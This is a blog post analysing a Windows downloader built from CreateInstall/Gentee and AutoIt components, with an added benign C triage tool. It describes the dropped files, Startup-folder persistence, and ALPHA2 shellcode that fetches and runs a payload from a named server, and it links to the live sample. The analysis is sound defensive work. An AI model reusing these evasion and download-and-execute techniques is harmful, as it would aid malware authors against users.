Sunday, January 20, 2013

#4 Analysis of an uncommon Downloader

This will be a quick analysis of a Downloader I recently came across (thanks to Artem for providing the sample!). What makes this malware special is the uncommon programming language it uses to accomplish its tasks (actually a scripting language). The malware itself is very rudimentary; only the actual Downloader (which spawns shellcode) is a bit more advanced. Unfortunately the server isn't responding to the requests from the Downloader, so it is unclear what the final purpose of this malware is. I think the scripting languages and the shellcode were chosen to evade (heuristic) AV detection. The detection rate of the Dropper is still very low (6/46), even 2 years after its creation:

https://www.virustotal.com/file/5cc4dde981052073f4ddef5d67d0bf5d38a2777d7ed810f97b69b8e3c8e5b776/analysis/

I haven't uploaded the dropped files, but I guess their detection rates are also very low, if they are detected at all. This task is left to the reader. ;-)

What is interesting about this malware:
- Makes use of the Gentee scripting language (actually it uses CreateInstall, which was written in Gentee)
- Makes use of the AutoIt scripting language
- Spawns shellcode to download additional component(s)

A dynamic analysis of this malware can be found at malwr.com:
http://malwr.com/analysis/dbabce375de619916e727d24679c6bd3

I'll try to give some additional information, so let's start with the Dropper.

Note: All files of this malware have the extension ".com", but they are all .exe files (PE executables simply renamed to .com).


Dropper

Sample: sample.exe
Size: 785,742 bytes
Timestamp: 31.01.2011 17:44:13
MD5: DBABCE375DE619916E727D24679C6BD3
SHA1: D8C7EF587EAB81C1BBC79AA695F5F7FF319F0484

The sample can be downloaded at kernelmode.info: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2445

The Dropper was created with the CreateInstall tool (www.createinstall.com) and consists of multiple files. CreateInstall itself is written in the Gentee programming language, which is actually a scripting language. Gentee programs can be bundled into standalone .exe files and are interpreted at runtime by the Gentee interpreter (genteert.dll and guig.dll). The Dropper creates the following files and folders in the Windows Temp folder:

- ...Temp\genteert.dll
- ...Temp\genteeXX.tmp (XX stands for random hex bytes)
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\Symantec\aqq1.com
- ...Temp\Symantec\faktura_scan535624.jpg
- ...Temp\Symantec\inct.com

Thereafter the file inct.com is executed and the following files are deleted again:

- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\genteeXX.tmp
- ...Temp\genteert.dll


inct.com

This file is a compiled AutoIt script, which by default is packed with UPX. After unpacking it, we can load the executable into an AutoIt decompiler (e.g. www.exe2aut.com) and see that this file merely shows the picture "faktura_scan535624.jpg" (see above) and runs the file "aqq1.com" (see above). The picture shows a Polish invoice ("faktura") from the product of the website fakturki.pl.
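Since every file in this package is a renamed PE and the AutoIt pieces arrive UPX-packed, a quick static pre-check saves time before reaching for a decompiler. The following is an added example (my own code, not code from the post or from the samples): it parses just enough of the PE header to confirm the MZ/PE signatures regardless of the .com extension, counts sections named UPX*, reads the COFF timestamp, and looks for the "AU3!EA06" marker that compiled AutoIt v3 scripts carry. Caveat: depending on where the script blob sits (overlay or compressed resource section), the marker may only show up after unpacking, so run the check again on the unpacked file. The sample buffer it ships with is constructed inline, and the timestamp in it is an assumed value chosen to resemble the stamp listed above (the post does not say whether that listing is UTC or local time).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the post or the samples: static triage of a
 * byte buffer for the properties noted above (PE under a .com name, UPX
 * section names, compiled-AutoIt marker, compile timestamp). */

struct triage {
    int is_pe;           /* "MZ" at offset 0 and "PE\0\0" at e_lfanew */
    uint16_t nsections;  /* COFF NumberOfSections */
    int upx_sections;    /* sections whose name starts with "UPX" */
    int autoit_marker;   /* "AU3!EA06" (compiled AutoIt v3 script) found */
    uint32_t timestamp;  /* COFF TimeDateStamp, seconds since 1970 */
};

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Plain byte search (memmem() is not portable). */
static int contains(const unsigned char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0)
            return 1;
    return 0;
}

/* Fills *t. Returns 0 for a PE image, -1 if the buffer is not one
 * (the AutoIt marker check runs either way). */
int triage_buffer(const unsigned char *buf, size_t n, struct triage *t)
{
    memset(t, 0, sizeof *t);
    t->autoit_marker = contains(buf, n, "AU3!EA06");
    if (n < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;
    uint32_t pe = rd32(buf + 0x3C);                    /* e_lfanew */
    if (pe > n || n - pe < 24 || memcmp(buf + pe, "PE\0\0", 4) != 0)
        return -1;
    t->is_pe = 1;
    const unsigned char *coff = buf + pe + 4;          /* 20-byte COFF header */
    t->nsections = rd16(coff + 2);
    t->timestamp = rd32(coff + 4);
    size_t sect = pe + 4 + 20 + rd16(coff + 16);       /* table follows optional header */
    for (uint16_t i = 0; i < t->nsections && sect + 40 <= n; i++, sect += 40)
        if (memcmp(buf + sect, "UPX", 3) == 0)         /* UPX0 / UPX1 / UPX2 */
            t->upx_sections++;
    return 0;
}

/* Constructed stand-in for a UPX-packed, AutoIt-compiled "x.com": just
 * enough header to exercise the checks, not a runnable executable. */
#define SAMPLE_LEN 400
void build_sample(unsigned char out[SAMPLE_LEN])
{
    memset(out, 0, SAMPLE_LEN);
    out[0] = 'M'; out[1] = 'Z';
    out[0x3C] = 0x40;                                  /* e_lfanew = 0x40 */
    memcpy(out + 0x40, "PE\0\0", 4);
    unsigned char *coff = out + 0x44;
    coff[0] = 0x4C; coff[1] = 0x01;                    /* Machine = i386 */
    coff[2] = 2;                                       /* NumberOfSections = 2 */
    uint32_t ts = 1296495853u;   /* 2011-01-31 17:44:13 UTC, assumed value (see lead-in) */
    coff[4] = (unsigned char)(ts & 0xFF);        coff[5] = (unsigned char)((ts >> 8) & 0xFF);
    coff[6] = (unsigned char)((ts >> 16) & 0xFF); coff[7] = (unsigned char)((ts >> 24) & 0xFF);
    coff[16] = 0xE0;                                   /* SizeOfOptionalHeader (PE32) */
    unsigned char *sect = out + 0x44 + 20 + 0xE0;      /* section table at offset 312 */
    memcpy(sect, "UPX0", 4);
    memcpy(sect + 40, "UPX1", 4);
    memcpy(sect + 80, "AU3!EA06", 8);                  /* marker placed as overlay data */
}

int main(int argc, char **argv)
{
    unsigned char sample[SAMPLE_LEN], *buf = sample;
    size_t n = SAMPLE_LEN;
    if (argc > 1) {                                    /* triage a real file instead */
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        fseek(f, 0, SEEK_END); long sz = ftell(f); rewind(f);
        buf = malloc(sz > 0 ? (size_t)sz : 1);
        n = fread(buf, 1, sz > 0 ? (size_t)sz : 0, f);
        fclose(f);
    } else {
        build_sample(sample);
    }
    struct triage t;
    int rc = triage_buffer(buf, n, &t);
    printf("PE: %s  sections: %u  UPX sections: %d  AutoIt marker: %s  stamp: %u\n",
           rc == 0 ? "yes" : "no", (unsigned)t.nsections, t.upx_sections,
           t.autoit_marker ? "yes" : "no", (unsigned)t.timestamp);
    return 0;
}
```

Run it without arguments to see the constructed sample triaged, or pass a path (e.g. inct.com) to triage a real file; a PE with a non-PE extension, UPX section names and the AU3! marker together are a strong hint that you are looking at one of the AutoIt pieces of this package.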


aqq1.com

This file was (also) created with CreateInstall and drops the following files and folders into the Windows Temp folder and the Autostart (Startup) folder:

- ...Temp\genteert.dll
- ...Temp\genteeXX.tmp
- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\Symantec\jqs.com
- ...\Autostart\Symantec.com

Then it runs the file "Symantec.com" and deletes the following files and folders:

- ...Temp\genteeXX\guig.dll
- ...Temp\genteeXX\setup_temp.gea
- ...Temp\genteeXX\
- ...Temp\genteeXX.tmp
- ...Temp\genteert.dll


Symantec.com

This is another AutoIt script compiled into a standalone .exe file. It starts the dropped file "jqs.com" with one of two parameters (alphanumeric shellcodes, encoded with ALPHA2 - see http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2).

It first checks whether the day of the year (the number of days elapsed in the current year) has reached 100. If so, jqs.com is started with the first shellcode and Symantec.com then sleeps for a minute. Then a file named "jar_cache879799398409779005999.tmp" is searched for in the Temp folder and deleted if found. I don't know why this "Java file" is searched for and deleted, but it is probably the file that gets downloaded, or dropped by the downloaded file. Another possibility is that the malware is launched by a Java applet or a Java exploit. If this Java file isn't found, jqs.com is started with the second shellcode. Then it again sleeps for a minute, searches for the same "Java file" and deletes it.
Figure 1: Symantec.com source code

There are two Polish words used as function names in the script ("uruchom" = "launch" and "sprzatanie" = "cleanup"). Together with the picture (see above), I think the malware's creator is from Poland or Polish-speaking.


jqs.com

This file was also packed with UPX. It launches one of the above shellcodes in a new thread to connect to the server at 184.82.19.103. It does this by allocating a memory buffer (VirtualAlloc()) and storing the passed parameter (the shellcode) in it. The pointer to the buffer is then passed as lpParameter to the CreateThread() API function. The new thread uses the pointer to call the shellcode (call eax).

Figure 2: Call to shellcode
The shellcode dynamically resolves some Windows API functions and then calls them. It requests data from the server (InternetReadFile()), copies it into a buffer (VirtualAlloc()) and passes execution to it. As mentioned at the beginning, the server isn't responding, so it's not possible to get more information about the downloaded data (another file or shellcode).

Figure 3: Alphanumeric encoded shellcode

That's all.

Now I need a Re-Neducation :-)
